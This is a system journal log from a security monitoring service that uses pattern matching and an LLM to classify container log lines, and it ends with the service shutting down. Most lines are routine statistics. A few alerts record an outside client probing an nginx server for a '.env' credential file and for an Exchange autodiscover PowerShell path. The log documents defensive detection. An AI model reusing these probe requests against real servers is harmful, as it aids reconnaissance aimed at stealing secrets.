Mar 20 16:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:22:01.949370 [observer] Patterns: hash=6996 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:22:31.939614 [observer] Pipeline: processed=7720 pattern_hits=7017 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:22:31.939642 [observer] Patterns: hash=7000 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:23:01.956792 [observer] Pipeline: processed=7722 pattern_hits=7019 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:23:01.956821 [observer] Patterns: hash=7002 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:23:31.939104 [observer] Pipeline: processed=7726 pattern_hits=7023 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:23:31.939130 [observer] Patterns: hash=7006 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:24:01.961126 [observer] Pipeline: processed=7728 pattern_hits=7025 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:24:01.961188 [observer] Patterns: hash=7008 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:24:31.956904 [observer] Pipeline: processed=7730 pattern_hits=7027 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:24:31.956932 [observer] Patterns: hash=7010 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:25:01.967840 [observer] Pipeline: processed=7736 pattern_hits=7033 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:25:01.967882 [observer] Patterns: hash=7016 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:25:31.949269 [observer] Pipeline: processed=7738 pattern_hits=7035 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:25:31.949299 [observer] Patterns: hash=7018 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:26:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:26:02.011706 [observer] Pipeline: processed=7742 pattern_hits=7039 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:26:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:26:02.011740 [observer] Patterns: hash=7022 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:26:31.941433 [observer] Pipeline: processed=7744 pattern_hits=7041 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:26:31.941461 [observer] Patterns: hash=7024 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:27:01.997062 [observer] Pipeline: processed=7748 pattern_hits=7045 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:27:01.997096 [observer] Patterns: hash=7028 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:27:31.943251 [observer] Pipeline: processed=7750 pattern_hits=7047 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:27:31.943276 [observer] Patterns: hash=7030 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:28:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:28:02.072808 [observer] Pipeline: processed=7752 pattern_hits=7049 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:28:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:28:02.073984 [observer] Patterns: hash=7032 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:28:31.940221 [observer] Pipeline: processed=7756 pattern_hits=7053 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:28:31.940247 [observer] Patterns: hash=7036 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:29:01.964256 [observer] Pipeline: processed=7758 pattern_hits=7055 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:29:01.964288 [observer] Patterns: hash=7038 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:29:31.941623 [observer] Pipeline: processed=7762 pattern_hits=7059 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:29:31.941657 [observer] Patterns: hash=7042 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:30:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:30:02.039591 [observer] Pipeline: processed=7764 pattern_hits=7061 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:30:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:30:02.039619 [observer] Patterns: hash=7044 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:30:31.941642 [observer] Pipeline: processed=7769 pattern_hits=7066 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:30:31.941675 [observer] Patterns: hash=7049 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:31:01.950630 [observer] Pipeline: processed=7772 pattern_hits=7069 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:31:01.950663 [observer] Patterns: hash=7052 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:31:31.941619 [observer] Pipeline: processed=7774 pattern_hits=7071 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:31:31.941648 [observer] Patterns: hash=7054 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:32:01.948907 [observer] Pipeline: processed=7778 pattern_hits=7075 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:32:01.948936 [observer] Patterns: hash=7058 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:32:31.947670 [observer] Pipeline: processed=7780 pattern_hits=7077 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:32:31.947699 [observer] Patterns: hash=7060 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:33:01.971765 [observer] Pipeline: processed=7784 pattern_hits=7081 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:33:01.971812 [observer] Patterns: hash=7064 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:33:31.947924 [observer] Pipeline: processed=7786 pattern_hits=7083 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:33:31.947954 [observer] Patterns: hash=7066 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:34:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:34:02.031759 [observer] Pipeline: processed=7789 pattern_hits=7086 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:34:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:34:02.031794 [observer] Patterns: hash=7069 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:34:31.940288 [observer] Pipeline: processed=7792 pattern_hits=7089 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:34:31.940316 [observer] Patterns: hash=7072 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:01.970435 [observer] Pipeline: processed=7794 pattern_hits=7091 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:01.970540 [observer] Patterns: hash=7074 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:14.967465 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 16:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:14.967582 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 16:35:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:26.491429 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 16:35:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:26.491467 [analyzer] Confidence 0.70 too low for pattern learning (need 0.85+)
Mar 20 16:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:31.943487 [observer] Pipeline: processed=7803 pattern_hits=7097 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:31.943522 [observer] Patterns: hash=7080 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=706
Mar 20 16:35:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:38.166941 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 16:35:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:35:38.166982 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 16:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:36:01.948010 [observer] Pipeline: processed=7806 pattern_hits=7100 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:36:01.948038 [observer] Patterns: hash=7083 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=706
Mar 20 16:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:36:31.942526 [observer] Pipeline: processed=7810 pattern_hits=7104 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:36:31.942555 [observer] Patterns: hash=7087 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=706
Mar 20 16:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:37:01.990544 [observer] Pipeline: processed=7812 pattern_hits=7106 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:37:01.990666 [observer] Patterns: hash=7089 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=706
Mar 20 16:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:37:31.940288 [observer] Pipeline: processed=7815 pattern_hits=7109 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:37:31.940315 [observer] Patterns: hash=7092 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=706
Mar 20 16:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:38:01.955456 [observer] Pipeline: processed=7818 pattern_hits=7112 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:38:01.955488 [observer] Patterns: hash=7095 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=706
Mar 20 16:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:38:31.955342 [observer] Pipeline: processed=7820 pattern_hits=7114 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:38:31.955367 [observer] Patterns: hash=7097 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=706
Mar 20 16:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:39:01.948804 [observer] Pipeline: processed=7824 pattern_hits=7118 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:39:01.948830 [observer] Patterns: hash=7101 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=706
Mar 20 16:39:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:39:13.545626 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T16:39:13.545368403Z 2026/03/20 16:39:13 [error] 422#422: *756382 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 145.223.59.95, server: _, request: "GE...
Mar 20 16:39:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:39:13.546446 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T16:39:13.545485246Z 145.223.59.95 - - [20/Mar/2026:16:39:13 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik...
Mar 20 16:39:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:39:14.053568 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T16:39:14.053301813Z 145.223.59.95 - - [20/Mar/2026:16:39:14 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Ge...
Mar 20 16:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:39:31.952045 [observer] Pipeline: processed=7829 pattern_hits=7123 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:39:31.952076 [observer] Patterns: hash=7106 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:40:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:40:02.071448 [observer] Pipeline: processed=7833 pattern_hits=7127 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:40:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:40:02.071489 [observer] Patterns: hash=7110 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:40:31.949899 [observer] Pipeline: processed=7837 pattern_hits=7131 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:40:31.949935 [observer] Patterns: hash=7114 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:41:01.991942 [observer] Pipeline: processed=7840 pattern_hits=7134 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:41:01.991972 [observer] Patterns: hash=7117 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:41:31.938777 [observer] Pipeline: processed=7843 pattern_hits=7137 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:41:31.938803 [observer] Patterns: hash=7120 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:42:02.028516 [observer] Pipeline: processed=7845 pattern_hits=7139 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:42:02.028554 [observer] Patterns: hash=7122 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:42:31.938565 [observer] Pipeline: processed=7849 pattern_hits=7143 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:42:31.938590 [observer] Patterns: hash=7126 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:43:01.963003 [observer] Pipeline: processed=7851 pattern_hits=7145 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:43:01.963031 [observer] Patterns: hash=7128 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:43:31.940268 [observer] Pipeline: processed=7855 pattern_hits=7149 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:43:31.940300 [observer] Patterns: hash=7132 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:44:01.976342 [observer] Pipeline: processed=7857 pattern_hits=7151 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:44:01.980358 [observer] Patterns: hash=7134 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:44:31.941995 [observer] Pipeline: processed=7860 pattern_hits=7154 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:44:31.942026 [observer] Patterns: hash=7137 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:45:01.958453 [observer] Pipeline: processed=7863 pattern_hits=7157 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:45:01.958486 [observer] Patterns: hash=7140 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:45:31.938905 [observer] Pipeline: processed=7867 pattern_hits=7161 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:45:31.938932 [observer] Patterns: hash=7144 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:46:01.970273 [observer] Pipeline: processed=7871 pattern_hits=7165 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:46:01.970300 [observer] Patterns: hash=7148 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:46:31.947712 [observer] Pipeline: processed=7873 pattern_hits=7167 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:46:31.947740 [observer] Patterns: hash=7150 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:47:01.958664 [observer] Pipeline: processed=7877 pattern_hits=7171 llm_calls=706 llm_errors=4 learned=8
Mar 20 16:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:47:01.958700 [observer] Patterns: hash=7154 prefix=17 regex=0 contains=0 deny=139 alert=859 suppress=0 misses=706
Mar 20 16:47:14 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer...
Mar 20 16:47:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:47:14.075058 [observer] Shutting down...
Mar 20 16:47:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:47:14.091746 [observer] Final stats: processed=7877 pattern_hits=7171 llm_calls=706 learned=8
Mar 20 16:47:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:47:14.091777 [observer] Shutdown complete
Mar 20 16:47:14 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully.
Mar 20 16:47:14 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer.
Mar 20 16:47:14 ip-172-26-12-110 systemd[1]: observer.service: Consumed 40.172s CPU time.